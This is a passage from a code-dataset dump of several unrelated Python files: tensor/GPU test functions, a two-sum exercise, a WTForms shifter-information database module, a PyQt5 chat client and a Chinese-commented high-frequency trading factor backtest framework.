Vocab(vocab_file='data/prediction/embeddings/user_vecs.vocab')\n print(f'user vocab length: {len(user_vocab)}')\n print([user_vocab[i] for i in range(5)])\n user_vectors = np.load('data/prediction/embeddings/user_vecs.npy')\n user_vectors = np.concatenate((np.zeros((2, user_vectors.shape[1]), dtype=np.float), user_vectors), axis=0)\n print(f'user vectors shape: {user_vectors.shape}')\n print('-' * 30)\n\n sub_vocab = Vocab(vocab_file='data/prediction/embeddings/sub_vecs.vocab')\n print(f'sub vocab length: {len(sub_vocab)}')\n print([sub_vocab[i] for i in range(5)])\n sub_vectors = np.load('data/prediction/embeddings/sub_vecs.npy')\n sub_vectors = np.concatenate((np.zeros((2, sub_vectors.shape[1]), dtype=np.float), sub_vectors), axis=0)\n print(f'sub vectors shape: {sub_vectors.shape}')\n print('-' * 30)\n\n words, word_vectors = load_glove_emb('data/prediction/embeddings/glove_word_embeds.txt')\n word_vectors = np.concatenate((np.zeros((2, word_vectors.shape[1]), dtype=np.float), word_vectors), axis=0)\n word_vocab = Vocab(words=words)\n print(f'word vocab length: {len(word_vocab)}')\n print([word_vocab[i] for i in range(5)])\n print(f'word vectors shape: {word_vectors.shape}')\n\n\n# test softmax\ndef test_softmax():\n data = np.random.rand(5, 2)\n x_gpu = Tensor(data=data, device='cuda')\n x_cpu = Tensor(data=data, device='cpu')\n\n print(x_gpu.softmax())\n print(x_cpu.softmax())\n\n\n# test dropout\ndef test_dropout():\n data = np.random.rand(10, 10)\n x_gpu = Tensor(data=data, device='cuda')\n x_dropout = x_gpu.dropout(0.1).cpu()\n print(x_gpu)\n print(x_dropout)\n print(x_dropout.shape)\n print(np.sum(x_dropout.data == 0))\n\n\ndef test_relu():\n data = np.random.rand(10, 10) - 0.5\n x_gpu = Tensor(data, device='cuda')\n x_cpu = Tensor(data, device='cpu')\n x_relu = x_gpu.relu()\n print(x_relu)\n print(x_relu.relu_grad())\n print(np.sum(np.sum(x_relu.cpu().data == 0)))\n\n # print(x_gpu.tanh())\n # print((np.exp(data) - np.exp(-data))/(np.exp(data) + np.exp(-data)))\n\n # print(x_gpu.sigmoid())\n # print(1/(1 + np.exp(-data)))\n\n # print(x_gpu.sigmoid_grad())\n # print(data * (1 - data))\n\n\ndef test_expand():\n data = np.array([1, 2, 3])\n x_gpu = Tensor(data, device='cuda')\n x_cpu = Tensor(data, device='cpu')\n print(x_gpu.expand(dim=0, copies=5))\n print(x_cpu.expand(dim=0, copies=5))\n print('norm', x_gpu.norm())\n\n\ndef test_gpu_vs_cpu():\n vectors = np.random.normal(0, 1, size=(20, 8)) * (2/28) ** 0.5\n vectors[0, :] = 0\n\n embedding_gpu = Embedding.from_pretrained(\n vectors=vectors,\n padding_index=0,\n device='cuda',\n autograd=True,\n )\n\n embedding_cpu = Embedding.from_pretrained(\n vectors=vectors,\n padding_index=0,\n device='cpu',\n autograd=True,\n )\n\n indices = Tensor([[0, 1, 0, 4, 5],\n [1, 4, 0, 1, 2]], device='cpu', d_type=np.int32)\n embeds_gpu = embedding_gpu(indices)\n embeds_cpu = embedding_cpu(indices)\n\n linear_cpu = Linear(8, 2, device='cpu', bias=True)\n linear_gpu = Linear(8, 2, device='cuda', bias=True)\n linear_gpu.weight = linear_cpu.weight.to('cuda')\n linear_gpu.bias = linear_cpu.bias.to('cuda')\n # print(embeds_gpu[0].shape)\n\n out_cpu = linear_cpu(embeds_cpu[0])\n out_gpu = linear_gpu(embeds_gpu[0])\n # print(out_cpu)\n # print(out_gpu)\n\n target = Tensor([1, 0, 1, 0, 0], device='cpu', d_type=np.int32)\n loss_gpu = out_gpu.cross_entropy(target)\n loss_cpu = out_cpu.cross_entropy(target)\n print(loss_cpu, loss_gpu)\n loss_gpu.backward()\n loss_cpu.backward()\n\n print(linear_gpu.weight.grad)\n print(linear_cpu.weight.grad)\n\n print(embedding_gpu.weight.grad)\n print(embedding_cpu.weight.grad)\n\n\ndef test_index_select_v2():\n x_cpu = np.random.rand(8, 5)\n x = Tensor(x_cpu, device='cuda', autograd=True)\n indices = Tensor([[1, 2, 3], [0, 0, 0]], device='cuda', d_type=np.int32)\n embs = x.index_selectv2(indices)\n print(x)\n print(embs)\n # print(x_cpu[[1, 2, 3]])\n\n\nif __name__ == '__main__':\n # test basic op\n # x = Tensor([1, 2, 3], device='cuda', autograd=True)\n # y = Tensor([4, 5, 6], device='cuda', autograd=True)\n # test_basic_ops(x, y)\n\n # test backward\n # test_backward()\n\n # test index select\n # test_index_select()\n\n # test get item\n # test_get_item()\n\n # test mm graph\n # test_mm_graph()\n\n # test lstm cell\n # test_lstm_cell()\n\n # test lstm layer\n # test_lstm_layer()\n\n # test build model\n # test_build_model()\n\n # test vocab\n # test_vocab()\n\n # test softmax\n # test_softmax()\n\n # test dropout\n test_dropout()\n\n # test relu\n # test_relu()\n\n # test expand\n # test_expand()\n\n # test_gpu_vs_cpu()\n\n # test_index_select_v2()\n","sub_path":"test_tensor_new.py","file_name":"test_tensor_new.py","file_ext":"py","file_size_in_byte":12267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498998515","text":"# -*- coding: utf-8 -*-\n\"\"\"\n---------------------------- \n @Time : 2018/11/23 14:16\n @Author : Mr.Guo\n @Site : https://github.com/stevenguo1995\n @File : 01_two_sum.py\n @Software: PyCharm\n---------------------------- \n\n题目\n----\n01 两数之和\n给定一个整数数组和一个目标值,找出数组中和为目标值的两个数。\n你可以假设每个输入只对应一种答案,且同样的元素不能被重复利用。\n----------------------------\n示例\n----\n给定 nums = [2, 7, 11, 15], target = 9\n\n因为 nums[0] + nums[1] = 2 + 7 = 9\n所以返回 [0, 1]\n----------------------------\n\"\"\"\n\n\nclass Solution:\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n # 方法一 遍历两次数组\n # l = len(nums)\n # for i in range(l - 1):\n # for j in range(i + 1,l):\n # if nums[i] + nums[j] == target:\n # return i, j\n\n # 方法二 遍历一次数组\n for i in range(len(nums)):\n if target - nums[i] in nums[i + 1:]:\n print(nums[i + 1:])\n return i, nums[i + 1:].index(target - nums[i]) + i + 1\n\n # 方法三 字典\n # d = {}\n # for i, num in enumerate(nums):\n # print(i,num)\n # if target - num in d:\n # return [d[target - num], i]\n # d[num] = i\n\n\nif __name__ == \"__main__\":\n n = [3, 2, 4, 11, 15]\n t = 6\n s = Solution()\n print(s.twoSum(n, t))\n","sub_path":"01_two_sum.py","file_name":"01_two_sum.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"404135091","text":"import psycopg2\nfrom .db import engine\nfrom .views import app\nfrom wtforms import Form, StringField, SelectField, validators\nfrom wtforms.fields.html5 import EmailField\nfrom wtforms.validators import ValidationError\n\nVALID_COUNTRIES = [\n ('',''), # Optional empty choice\n ('usa', 'USA'),\n ('canada', 'Canada'),\n ('portugal', 'Portugal'),\n ('uk', 'UK'),\n ('germany', 'Germany'),\n ('mexico', 'Mexico')\n]\nFORM_KEYS = ['firstname', 'lastname', 'expert', 'email', 'phone', 'country']\n\nclass ShifterInfoForm(Form):\n def validate_phone(form, field):\n if len(field.data) != 11 and len(field.data) != 12:\n raise ValidationError(\"Phone number wrong length\")\n if field.data and not str(field.data).isdigit():\n raise ValidationError(\"Phone number must contain only digits\")\n\n firstname = StringField('First Name', [validators.DataRequired()])\n lastname = StringField('Last Name', [validators.DataRequired()])\n expert = SelectField('Expert', choices=[])\n email = EmailField('Email', [validators.Optional(), validators.Email()])\n phone = StringField('Phone', [validators.Optional()])\n country = SelectField('Country', choices=VALID_COUNTRIES)\n\ndef get_experts():\n \"\"\"\n Returns a list of the names of all on-call experts.\n \"\"\"\n conn = engine.connect()\n result = conn.execute(\"SELECT firstname, lastname FROM experts\")\n row = result.fetchall()\n names = []\n for first, last in row:\n name = first + \" \" + last\n names.append((name, name))\n\n return names\n\ndef get_shifter_information():\n \"\"\"\n Get some of the information about the current shifter.\n\n Returns the first/last name of the current shifter and the first name of\n the on-call expert.\n \"\"\"\n conn = engine.connect()\n\n result = conn.execute(\"SELECT firstname, lastname, email, phonenumber, expert \"\n \"FROM current_shifter_information\")\n\n row = result.fetchone()\n if row is None:\n return None, None, None\n\n email = row[2]\n phone = row[3]\n\n if len(email) and len(phone):\n updates = \"Receiving both email and text alerts.\"\n elif len(email):\n updates = \"Receiving only email alerts.\"\n elif len(phone):\n updates = \"Receiving only text alerts.\"\n else:\n updates = \"Receiving neither text or email alerts.\"\n\n shifter = \"\"\n expert = \"\"\n\n shifter_firstname = row[0]\n shifter_lastname = row[1]\n if shifter_firstname and shifter_lastname:\n shifter = \"Current shifter: %s %s\" % \\\n (shifter_firstname.capitalize(), shifter_lastname.capitalize())\n\n expert_name = row[4]\n if expert_name:\n first = expert_name.split()[0]\n last = expert_name.split()[1]\n expert = \"Current expert: %s %s\" % (first, last)\n\n return shifter, expert, updates\n\ndef set_shifter_information(form):\n \"\"\"\n Update the database with the current shift information.\n \"\"\"\n conn = psycopg2.connect(dbname=app.config['DB_NAME'],\n user=app.config['DB_OPERATOR'],\n host=app.config['DB_HOST'],\n password=app.config['DB_OPERATOR_PASS'])\n conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n\n cursor = conn.cursor()\n\n result = cursor.execute(\"INSERT INTO shifter_information (firstname, \"\n \"lastname, phonenumber, email, country, expert) \"\n \"VALUES (%(firstname)s, %(lastname)s, %(phone)s, \"\n \"%(email)s, %(country)s, %(expert)s)\", form.data)\n","sub_path":"minard/shifter_information.py","file_name":"shifter_information.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309947300","text":"from PyQt5 import QtWidgets, QtCore\nfrom clientui import Ui_MainWindow\nimport requests, datetime\n\n\nclass App(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.SendButton.pressed.connect(self.send_button_click_handler)\n self.last_timestamp = 0\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.time_handler)\n self.timer.start(1000)\n\n def send_button_click_handler(self):\n username = self.LoginEdit.text()\n password = self.PasswordEdit.text()\n message = self.textEdit.toPlainText()\n self.textEdit.clear()\n\n requests.get(\n \"http://127.0.0.1:5000/send_message\",\n json={\n \"username\": username,\n \"password\": password,\n \"text\": message\n }\n )\n\n def time_handler(self):\n messages = requests.get(\n \"http://127.0.0.1:5000/get_messages\",\n params={\"after\": self.last_timestamp}\n ).json()['messages']\n for message in messages:\n dt = datetime.datetime.fromtimestamp(message[\"timestamp\"])\n dt = dt.strftime(\"%H:%M %d-%m\")\n self.textBrowser.append(dt + \" \"+message[\"username\"])\n self.textBrowser.append(message[\"text\"] + \"\\n\")\n self.last_timestamp = message[\"timestamp\"]\n\n\napp = QtWidgets.QApplication([])\nwindow = App()\nwindow.show()\napp.exec_()","sub_path":"messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"278047217","text":"import time\nimport pickle\nimport warnings\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport pyecharts\nfrom pyecharts import options as opts\nfrom pyecharts.charts import Line, Bar\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nwarnings.filterwarnings('ignore')\n\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\nmatplotlib.rcParams['font.family'] = 'sans-serif'\nmatplotlib.rcParams['axes.unicode_minus'] = False\n\n\nclass PreProcessing(object):\n\n def __init__(self):\n self.stock = None\n self.addition_counts = 100\n self.max_quantile_thres = 0.85\n self.min_quantile_thres = 0.15\n self.quantile_thres_list = [0.075, 0.425, 0.575, 0.925]\n # 用中期(最近几天)的数据去归一化:就是用中期数据的均值方差进行归一\n self.past_data = None\n self.unwash_past_data = None\n self.past_mean = None\n self.past_std = None\n # 用中期数据得到的中位数\n self.past_median = None\n # 用中期的数据得到的开仓、平仓因子分位数阈值\n self.thres_list = None\n # 中期数据\n self.past_factor_data = None\n\n def reset_quantile_thres(self, min_quantile_thres, max_quantile_thres):\n \"\"\"\n 设定分位数上下限\n :param max_quantile_thres: 分位数的上限\n :param min_quantile_thres: 分位数的下限\n :return:\n \"\"\"\n self.max_quantile_thres = max_quantile_thres\n self.min_quantile_thres = min_quantile_thres\n return\n\n def reset_quantile_list(self, quantile_list):\n self.quantile_thres_list = quantile_list\n return\n\n def set_past_data(self, extreme=True, standarlize=True):\n \"\"\"\n 设定中期数据,并调用最外层的因子算法来计算因子值(近30个交易日的数据),根据需求对因子值进行去极值、标准化\n data: past_data\n \"\"\"\n self.stock = self.unwash_past_data['symbol'].iloc[0]\n self.past_data = self.get_factor(self.unwash_past_data)\n self.past_factor_data = self.past_data['factor']\n\n self.past_data.to_excel(r'./数据/{}_past_data.xlsx'.format(self.stock))\n # 计算过去数据的均值、标准差、中位数,最新的和历史的清洗均以该计算的结果为依据\n self.past_mean = self.past_factor_data.mean()\n self.past_std = self.past_factor_data.std()\n self.past_median = self.past_factor_data.quantile(0.5)\n # 对过去的数据进行去极值、标准化\n if extreme:\n past_factor_data = self.filter_extreme_data(self.past_factor_data, method='sigma')\n else:\n past_factor_data = self.past_factor_data\n if standarlize:\n past_factor_data = self.standardize_data(past_factor_data)\n else:\n past_factor_data = self.past_factor_data\n # 开平仓阈值(因子完全确立时设定,如果对过去的因子进行去极值标准化,那么新的数据需要同样的操作)\n # self.thres_list = abs(past_factor_data).quantile([self.min_quantile_thres, self.max_quantile_thres]).values\n self.thres_list = past_factor_data.quantile(self.quantile_thres_list).values\n print('开/平仓阈值:', self.thres_list)\n return\n\n def get_factor(self, data):\n \"\"\"\n # 构造因子的函数,需要在后续重构\n \"\"\"\n return data\n\n def standardize_data(self, data):\n \"\"\"\n # 对数据标准化,用过去一段时间的数据的均值和方差进行标准化\n \"\"\"\n return (data - self.past_mean) / self.past_std\n\n def filter_extreme_data(self, data, method=None, n=3, min_thres=0.025, max_thres=0.975):\n \"\"\"\n # 去极值,用过去一段时间的数据的均值、方差、分位数和中位数等等进行标准化\n \"\"\"\n if method == 'percentile':\n quatile_min, quantile_max = self.past_factor_data.quantile([min_thres, max_thres])\n return np.clip(data, quatile_min, quantile_max)\n\n elif method == 'sigma':\n mean = self.past_mean\n std = self.past_std\n max_range = mean + n * std\n min_range = mean - n * std\n return np.clip(data, min_range, max_range)\n\n elif method == 'median':\n new_median = ((data - self.past_median).abs()).quantile(0.5)\n max_range = self.past_median + n * new_median\n min_range = self.past_median - n * new_median\n return np.clip(data, min_range, max_range)\n\n\nclass FactorStatistics(PreProcessing):\n\n def __init__(self):\n super(FactorStatistics, self).__init__()\n # 数据\n # self.stock = None\n # 因子统计指标\n self.std = 0.0 # 因子均值\n self.mean = 0.0 # 因子方差\n self.y_mid_5_corr = 0.0 # 因子值与5个tick之后的收益率两个时间序列的相关系数\n # (因子值为正做多,反之做空) 需要注意的是,因子的平均值在0附近较好,因为需要多空是均衡的\n self.y_mid_5_mean = 0.0 # 代表因子值绝对值大于0.85分位的值的未来5tick收益的平均值\n self.y_mid_10_corr = 0.0 # 因子值与10个tick之后的收益率两个时间序列的相关系数\n self.y_mid_10_mean = 0.0 # 代表因子值绝对值大于0.85分位的值的未来10tick收益的平均值\n self.y_mid_30_corr = 0.0 # 因子值与30个tick之后的收益率两个时间序列的相关系数\n self.y_mid_30_mean = 0.0 # 代表因子值绝对值大于0.85分位的值的未来30tick收益的平均值\n self.statistics_series = None # 上述因子统计指标的series\n # 因子回测指标\n self.hold_periods = None # 单笔持仓时间\n self.single_rts = 0.0 # 单笔收益\n self.pct_change = 0.0 # 单笔收益率\n self.trade_counts = 0 # 交易次数\n self.win_rate = 0.0 # 胜率\n self.win_rate_large = 0.0 # 非亏损胜率\n self.score = 0.0 # max(每笔净利润,0)*pow(min(40,平均交易次数), 0.5)\n self.records_series = None\n # 交易信息\n self.records = None # 交易记录\n # 最新测试数据\n self.data = None\n # 详细的收益表\n self.detail_rts = None\n\n def set_new_data(self, extreme=True, standarlize=True):\n \"\"\"\n 获取数据,并计算因子值, 根据需要进行去极值和标准化\n df: 最新的数据\n \"\"\"\n # 需要拼一段过去的数据(其中中期尾部的数据[]和当前日期的数据必须是清洗过后的)\n self.data = pd.concat([self.past_data.tail(self.addition_counts), self.data], axis=0)\n self.data = self.get_factor(self.data)\n\n if extreme:\n self.data['factor'] = self.filter_extreme_data(self.data['factor'], method='sigma')\n if standarlize:\n self.data['factor'] = self.standardize_data(self.data['factor'])\n\n return\n\n def get_factor(self, data):\n \"\"\"\n # 构造因子,需要子在后续重构\n \"\"\"\n return data\n\n def back_test(self):\n \"\"\"\n # 回测\n \"\"\"\n # 阈值定义:对全部因子值(记为f)求绝对值后取分位数,定义0.85分位数为开仓阈值,记为a;定义0.15分位数为平仓阈值,记为b。\n # 开仓:f>a时开多头,f<-a的时候开空头。\n # 平仓:仓位为多头,当f<-b时平仓。 仓位为空头,当f>b时平仓。\n self.data = self.data[self.addition_counts:]\n # self.data['factor'] = self.data['factor'] - 1\n df = self.data.copy()\n df.to_excel(r'./数据/{}_new_data.xlsx'.format(self.stock))\n # open_buy_thres = self.thres_list[1]\n # close_buy_thres = -self.thres_list[0]\n # open_sell_thres = -self.thres_list[1]\n # close_sell_thrs = self.thres_list[0]\n open_buy_thres = self.thres_list[3]\n close_buy_thres = self.thres_list[1]\n open_sell_thres = self.thres_list[0]\n close_sell_thrs = self.thres_list[2]\n df['status'] = df['factor'].apply(lambda x: 2 if x > open_buy_thres else\n 1 if x > close_sell_thrs else\n -2 if x < open_sell_thres else\n -1 if x < close_buy_thres else np.NaN)\n df['status'].fillna(method='pad', axis=0, inplace=True)\n df_iterrow = df.loc[(df['status'] == 2) | (df['status'] == -2)]\n print('信号次数', len(df_iterrow))\n trade_records_dict = {}\n # 交易价格按照快照的收盘价进行取值\n while len(df_iterrow) != 0:\n try:\n # 交易时间\n _time = df_iterrow['date'].iloc[0]\n _price = df_iterrow['close'].iloc[0]\n if df_iterrow['status'].iloc[0] == 2:\n _side = 1\n else:\n _side = 2\n if _side == 1:\n _side2 = 2\n # 第一笔交易是多,第二笔平多\n _df = df.loc[(df['status'] < 0) & (df['date'] > _time)]\n _time2 = _df['date'].iloc[0]\n _price2 = _df['close'].iloc[0]\n _single_rts = _price2 - _price\n _pct_change = _price2 / _price - 1\n else:\n _side2 = 1\n _df = df.loc[(df['status'] > 0) & (df['date'] > _time)]\n _time2 = _df['date'].iloc[0]\n _price2 = _df['close'].iloc[0]\n _single_rts = _price - _price2\n _pct_change = _price / _price2 - 1\n df_iterrow = df_iterrow[df_iterrow['date'] > _time2]\n _hold_periods = (datetime.datetime.strptime(_time2, '%Y-%m-%d %H:%M:%S') -\n datetime.datetime.strptime(_time, '%Y-%m-%d %H:%M:%S')).seconds\n\n trade_records_dict[_time] = [_time, _side, _price,\n _time2, _side2, _price2,\n _single_rts, _pct_change, _hold_periods]\n except:\n break\n\n trade_records_df = pd.DataFrame(trade_records_dict, index=['开仓时间', '开仓方向', '开仓价格',\n '平仓时间', '平仓方向', '平仓价格',\n '单笔盈亏', '单笔收益率', '持仓时间']).T\n self.records = trade_records_df\n return trade_records_df\n\n def calculate_statistics(self):\n \"\"\"\n # 计算因子统计指标\n \"\"\"\n self.data['abs_factor'] = abs(self.data['factor'])\n self.data['rts5'] = self.data['close'].shift(-5) / self.data['close'] - 1\n self.data['rts10'] = self.data['close'].shift(-10) / self.data['close'] - 1\n self.data['rts30'] = self.data['close'].shift(-30) / self.data['close'] - 1\n self.data.sort_values(by=['abs_factor'], ascending=True, inplace=True)\n # 计算因子值与未来N个tick的收益率的相关系数\n self.y_mid_5_corr = self.data[['factor', 'rts5']].corr().iloc[0, 1]\n self.y_mid_10_corr = self.data[['factor', 'rts10']].corr().iloc[0, 1]\n self.y_mid_30_corr = self.data[['factor', 'rts30']].corr().iloc[0, 1]\n # 因子值绝对值大于0.85分位的值的未来Ntick收益的平均值\n condition_df = self.data[self.data['abs_factor'] > self.data['abs_factor'].quantile([0.85]).values[0]]\n self.y_mid_5_mean = condition_df['rts5'].mean()\n self.y_mid_10_mean = condition_df['rts10'].mean()\n self.y_mid_30_mean = condition_df['rts30'].mean()\n # 计算因子均值和方差\n self.mean = self.data['factor'].mean()\n self.std = self.data['factor'].std()\n statistics_dict = {'y_mid_5_corr': self.y_mid_5_corr,\n 'y_mid_10_corr': self.y_mid_10_corr,\n 'y_mid_30_corr': self.y_mid_30_corr,\n 'y_mid_5_mean': self.y_mid_5_mean,\n 'y_mid_10_mean': self.y_mid_10_mean,\n 'y_mid_30_mean': self.y_mid_30_mean,\n 'std': self.std,\n 'mean': self.mean}\n self.statistics_series = pd.Series(statistics_dict)\n # statistics_series = pd.DataFrame(self.statistics_series, columns=['performance']).T\n statistics_series = self.statistics_series\n # 展示因子统计指标\n # print('----------------- 因子统计指标 -----------------')\n return statistics_series\n\n def calculate_records(self):\n \"\"\"\n # 计算回测指标\n \"\"\"\n self.hold_periods = self.records['持仓时间'].mean()\n self.single_rts = self.records['单笔盈亏'].mean()\n self.pct_change = self.records['单笔收益率'].mean()\n self.trade_counts = len(self.records)\n self.win_rate = round(float(len(self.records[self.records['单笔收益率'] > 0]) / self.trade_counts), 4)\n self.win_rate_large = round(float(len(self.records[self.records['单笔收益率'] >= 0]) / self.trade_counts), 4)\n # 平台公式:max(每笔净利润,0)​*pow(min(40,平均交易次数), 0.5)\n # 实际显示的分数是:单笔收益*100*pow(min(40*10,平均交易次数), 0.5)\n self.score = max(self.single_rts, 0) * pow(min(40 * 10, self.trade_counts), 0.5) * 100\n # 计算最大回撤\n cumprod_pct_change = (self.records['单笔收益率'] + 1).cumprod()\n cummax_pct_change = cumprod_pct_change.cummax()\n max_down = round(abs((cumprod_pct_change - cummax_pct_change).min()), 4)\n records_dict = {'持仓周期(tick)': self.hold_periods / 3,\n '单笔收益': self.single_rts,\n '单笔收益率': self.pct_change,\n '交易次数/天/支': self.trade_counts,\n '盈利胜率': self.win_rate,\n '非亏损胜率': self.win_rate_large,\n '最大回撤': max_down,\n '得分': self.score}\n self.records_series = pd.Series(records_dict)\n # 展示回测指标\n # print('----------------- 因子回测指标 ----------------- ')\n # records_series = pd.DataFrame(self.records_series, columns=['performance']).T\n records_series = self.records_series\n return records_series\n\n def get_combine_trades(self):\n df = self.records\n df_open = df[['开仓时间', '开仓方向', '开仓价格']]\n df_close = df[['平仓时间', '平仓方向', '平仓价格']]\n df_open['status'] = df_open['开仓方向'].apply(lambda x: 2 if x < 2 else -2)\n df_close['status'] = df_close['平仓方向'].apply(lambda x: 1 if x < 2 else -1)\n df_open.columns = ['time', 'side', 'price', 'status']\n df_close.columns = ['time', 'side', 'price', 'status']\n df_comb = pd.concat([df_open, df_close], axis=0)\n df_comb.sort_values(['time'], ascending=True, inplace=True)\n df_comb.set_index('time', drop=True, inplace=True)\n\n return df_comb\n\n def get_detail_returns(self):\n # 获取收盘价序列\n df_close = self.data[['date', 'close']]\n df_close.set_index('date', inplace=True, drop=True)\n # 获取成交记录\n df_trade = self.get_combine_trades()\n df = pd.concat([df_close, df_trade[['status']]], axis=1)\n df.fillna(method='pad', inplace=True)\n df['rts_positive'] = df['close'] / df['close'].shift(1) - 1\n df['rts_negative'] = df['close'].shift(1) / df['close'] - 1\n df['status_shift'] = df['status'].shift(1)\n df['rts_last'] = list(map(lambda x, y, z: x if z == -2 else y if z == 2 else 0,\n df['rts_negative'].values,\n df['rts_positive'].values,\n df['status_shift'].values))\n df['累计收益率'] = (df['rts_last'] + 1).cumprod()\n self.detail_rts = df\n return df\n\n def show_pnl(self):\n \"\"\"\n # 收益曲线可视化\n \"\"\"\n _data = self.get_detail_returns()\n fig = plt.figure(figsize=(16, 8))\n ax = fig.add_subplot(111)\n ax.plot(_data.index.values, _data['累计收益率'].values, label='pnl', color='red')\n ax2 = ax.twinx()\n ax2.plot(_data.index.values, _data['close'].values, label='price')\n ax.set_xticks([_data.index.tolist()[i] for i in range(0, len(_data.index), 50)])\n ax.set_xticklabels(\n [_data.index.tolist()[i] for i in range(0, len(_data.index), 50)],\n rotation=30)\n ax2.set_xticks([_data.index.tolist()[i] for i in range(0, len(_data.index), 50)])\n ax2.set_xticklabels(\n [_data.index.tolist()[i] for i in range(0, len(_data.index), 50)],\n rotation=30)\n ax.set_title(u'收益曲线')\n ax.set_ylabel(r'累计收益')\n ax2.set_ylabel(r'价格')\n ax.set_xlabel(r'时间')\n ax.legend(loc='upper left')\n ax2.legend(loc='upper right')\n plt.show()\n return\n\n def show_pnl_pyecharted(self, isNoteBook=True):\n \"\"\"\n # 因子值和点位可视化\n \"\"\"\n _data = self.get_detail_returns()\n # print(_data)\n if isNoteBook:\n width = \"900px\"\n height = \"400px\"\n else:\n width = \"1800px\"\n height = \"800px\"\n\n def overlap_rts() -> Line:\n x = _data.index.tolist()\n line1 = (\n Line(init_opts=opts.InitOpts(width=width, height=height))\n .add_xaxis(x)\n .add_yaxis(\"累计收益\", _data['累计收益率'].values)\n .extend_axis(\n yaxis=opts.AxisOpts(\n name='价格',\n axislabel_opts=opts.LabelOpts(formatter=\"{value}\"),\n is_scale=True\n ))\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .set_global_opts(\n toolbox_opts=opts.ToolboxOpts(is_show=True),\n title_opts=opts.TitleOpts(title=\"收益曲线\"), # 设定title\n yaxis_opts=opts.AxisOpts(\n name='累计收益',\n axislabel_opts=opts.LabelOpts(formatter=\"{value}\"), # 设定y轴标签\n is_scale=True\n ),\n xaxis_opts=opts.AxisOpts(\n interval=50,\n axislabel_opts=opts.LabelOpts(rotate=30, font_size=10) # 设定x轴标签\n ),\n datazoom_opts=opts.DataZoomOpts(is_show=True, range_start=20, range_end=60, pos_top='50'), # 缩放功能\n brush_opts=opts.BrushOpts(tool_box='polygon'),\n tooltip_opts=opts.TooltipOpts(is_show=True, trigger=\"axis\") # 设定光标\n )\n )\n\n line = Line().add_xaxis(x).add_yaxis(\"价格\", _data['close'].values, yaxis_index=1)\n line1.overlap(line)\n return line1\n\n if isNoteBook:\n return overlap_rts()\n else:\n overlap_rts().render('./收益/{}_收益曲线.html'.format(self.stock)) # 本地存档\n return\n\n def show_factor(self, isNoteBook=True):\n \"\"\"\n # 因子值和点位可视化\n \"\"\"\n df = self.data[['date', 'close', 'factor']]\n df_record = self.records.copy()\n for _, vals in df_record.iterrows():\n if vals['开仓方向'] == 2:\n df.loc[(df.date >= vals['开仓时间']) & (df.date <= vals['平仓时间']), '空头'] = 1\n else:\n df.loc[(df.date >= vals['开仓时间']) & (df.date <= vals['平仓时间']), '多头'] = 1\n try:\n df['空头'] = df['空头'] * df['close']\n except:\n df['空头'] = np.NaN\n try:\n df['多头'] = df['多头'] * df['close']\n except:\n df['多头'] = np.NaN\n df.loc[~((df['空头'].notna()) | (df['空头'].notna())), '空仓'] = 1\n df['空仓'] = df['空仓'] * df['close']\n df.set_index('date', inplace=True)\n df.sort_index(ascending=True, inplace=True)\n\n if isNoteBook:\n width = \"900px\"\n height = \"400px\"\n else:\n width = \"1800px\"\n height = \"800px\"\n\n def overlap_rts() -> Line:\n x = df.index.tolist()\n line1 = (\n Line(init_opts=opts.InitOpts(width=width, height=height))\n .add_xaxis(x)\n .add_yaxis(\"价格\", df['close'].values,\n is_symbol_show=False,\n is_connect_nones=False,\n color='orange') # lightskyblue\n .extend_axis(\n yaxis=opts.AxisOpts(\n name='因子值',\n axislabel_opts=opts.LabelOpts(formatter=\"{value}\"),\n is_scale=True\n )\n )\n .set_series_opts(label_opts=opts.LabelOpts(is_show=False))\n .set_global_opts(\n toolbox_opts=opts.ToolboxOpts(is_show=True),\n title_opts=opts.TitleOpts(title=\"入场点位图\"), # 设定title\n yaxis_opts=opts.AxisOpts(\n name='价格',\n axislabel_opts=opts.LabelOpts(formatter=\"{value}\"), # 设定y轴标签\n is_scale=True\n ),\n xaxis_opts=opts.AxisOpts(\n interval=50,\n axislabel_opts=opts.LabelOpts(rotate=30, font_size=10) # 设定x轴标签\n ),\n datazoom_opts=opts.DataZoomOpts(is_show=True, range_start=20, range_end=60, pos_top='50'), # 缩放功能\n brush_opts=opts.BrushOpts(tool_box='polygon'),\n tooltip_opts=opts.TooltipOpts(is_show=True, trigger=\"axis\") # 设定光标\n )\n )\n\n line2 = Line().add_xaxis(x).add_yaxis(\"持有多头\", df['多头'].values,\n yaxis_index=0,\n is_symbol_show=False,\n is_connect_nones=False,\n color='red')\n line3 = Line().add_xaxis(x).add_yaxis(\"持有空头\", df['空头'].values,\n yaxis_index=0,\n is_symbol_show=False,\n is_connect_nones=False,\n color='blue')\n line4 = Line().add_xaxis(x).add_yaxis(\"因子值\", df['factor'].values,\n yaxis_index=1,\n is_symbol_show=False,\n color='black')\n line1.overlap(line2).overlap(line3).overlap(line4)\n return line1\n\n if isNoteBook:\n return overlap_rts()\n else:\n overlap_rts().render('./入场/{}_入场点位图.html'.format(self.stock)) # 本地存档\n return\n\n def run(self):\n \"\"\"\n # 启动\n \"\"\"\n self.back_test()\n return self.calculate_statistics(), \\\n self.calculate_records(), \\\n self.show_pnl_pyecharted(False), \\\n self.show_factor(False)\n","sub_path":"tick/hft_frame.py","file_name":"hft_frame.py","file_ext":"py","file_size_in_byte":24078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"37157332","text":"import torch\r\nimport 